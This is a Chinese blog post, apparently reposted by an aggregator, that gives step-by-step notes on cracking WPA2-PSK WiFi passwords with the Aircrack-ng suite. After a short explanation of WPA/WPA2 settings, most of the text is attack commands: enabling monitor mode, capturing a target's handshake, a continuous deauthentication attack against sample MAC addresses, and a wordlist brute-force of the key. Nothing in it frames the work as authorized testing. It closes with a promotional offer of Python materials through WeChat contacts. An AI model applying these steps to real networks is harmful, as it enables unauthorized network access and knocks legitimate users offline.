WiFi无线渗透 WPA2-PSK密码破解笔记

Posted 程序员启航

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WiFi无线渗透 WPA2-PSK密码破解笔记相关的知识,希望对你有一定的参考价值。

WPA/WPA2

WPA/WPA2是一种比WEP强壮的加密算法,挑选这种安全类型,路由器将选用Radius服务器进行身份认证并得到密钥的WPA或WPA2安全形式。因为要架起一台专用的认证服务器,价值对比贵重且保护也很杂乱,所以不推荐不同用户运用此安全类型。

WPA-PSK/WPA2-PSK:

WPA-PSK/WPA2-PSK安全类型其实是WPA/WPA2的一种简化版本,它是依据同享密钥的WPA形式,安全性很高,设置也相对简单,适合不同家庭用户和小型企业运用。其详细设置:
认证类型:该项用来挑选体系选用的安全形式,即主动、WPA-PSK、WPA2-PSK。
主动:若挑选该项,路由器会依据主机恳求主动挑选WPA-PSK或WPA-PSK的安全形式。
加密算法:该项用来挑选对无线数据进行加密的安全算法,选项有主动、TKIP、AES。默许选项为主动,挑选该项后,路由器将依据实践需求主动挑选TKIP或AES加密办法。留意11N形式不支持TKIP算法。
PSK暗码:该项就是WPA-PSK/WPA2-PSK的初始密钥了,在设置是,需求为8-63个ASCII字符或者8-64个十六进制的字符。
组密钥更新周期:该项设置播送和组博密钥的定时更新,以秒为单位,最小值为30,若该值为0,问表示不进行更新。


使用Aircrack-ng抓取WPA2-PSK握手包

主要步骤:
1.设置无线网卡至监听模式 airmon-ng start wlan0
2.扫描周围WPA2-PSK加密的无线信号 airodump-ng wlan0mon
3.新建一个终端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon 需指定信道
4.等待过程中,发起DeAuth攻击,强制将客户端踢下线重连,抓取握手包:
aireplay-ng -0 5 -a BSSID -c STATION wlan0mon设置为发起5次攻击
如果想要不停的发起攻击就是这样aireplay-ng -0 0 -a BSSID -c STATION wlan0mon


开始操作

我使用的网卡是TL-WN722N

此时需要让虚拟机连接网卡

连接成功后,输入ifconfig会看到

然后输入airmon-ng start wlan0

成功后

开始监听(扫描周围的无线信号)

途中CN为信道

airodump-ng -c 信道 --bssid xxx -w 保存路径 wlan0mon

抓取目标的握手包

参数:—ivs -w FAN 保存ivs格式的包,名字为test —bssid 要破解ap的ssid

强制将客户端踢下线aireplay-ng -0 0 -a 目标的MAC地址 -c 目标客户端MAC wlan0mon

aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon

开始进行攻击,但是有时候该命令会报错。这是因为网卡会随机使用信道,信道不同,多尝试几次同样的命令直到成功就行了

如图所示就证明抓到了握手包

最后用好的字典爆破

开始破解密码,执行如下的命令,成功后就可以看到已经破解出的密码,如果密码复杂一点,可能需要时间

aircrack-ng -w 字典 保存的包

aircrack-ng -w 后面都是绝对路径

说实在的,每次在后台看到一些读者的回应都觉得很欣慰,我想把我收藏的一些编程干货贡献给大家,回馈每一个读者,希望能帮到你们。

干货主要有:

① 2000多本Python电子书(主流和经典的书籍应该都有了)

② Python标准库资料(最全中文版)

③ 项目源码(四五十个有趣且经典的练手项目及源码)

④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)

⑤    Python所有知识点汇总(可以弄清楚Python的所有方向和技术)

如果你用得到的话可以直接拿走,有需要的朋友可以添加我的微信:difan159 或者yanle7758258    获取!

以上是关于WiFi无线渗透 WPA2-PSK密码破解笔记的主要内容,如果未能解决你的问题,请参考以下文章

5.无线渗透 wpa wifi 破解

苹果电脑无线网络设置

wifi密码修改不了,提示当前操作无效,请检查配置参数怎么办?

无线网卡ssid和密码

无线WiFi安全渗透与攻防之WIFI07-WEP-wifite自动化渗透WEP加密

用笔记本电脑如何破除wifi密码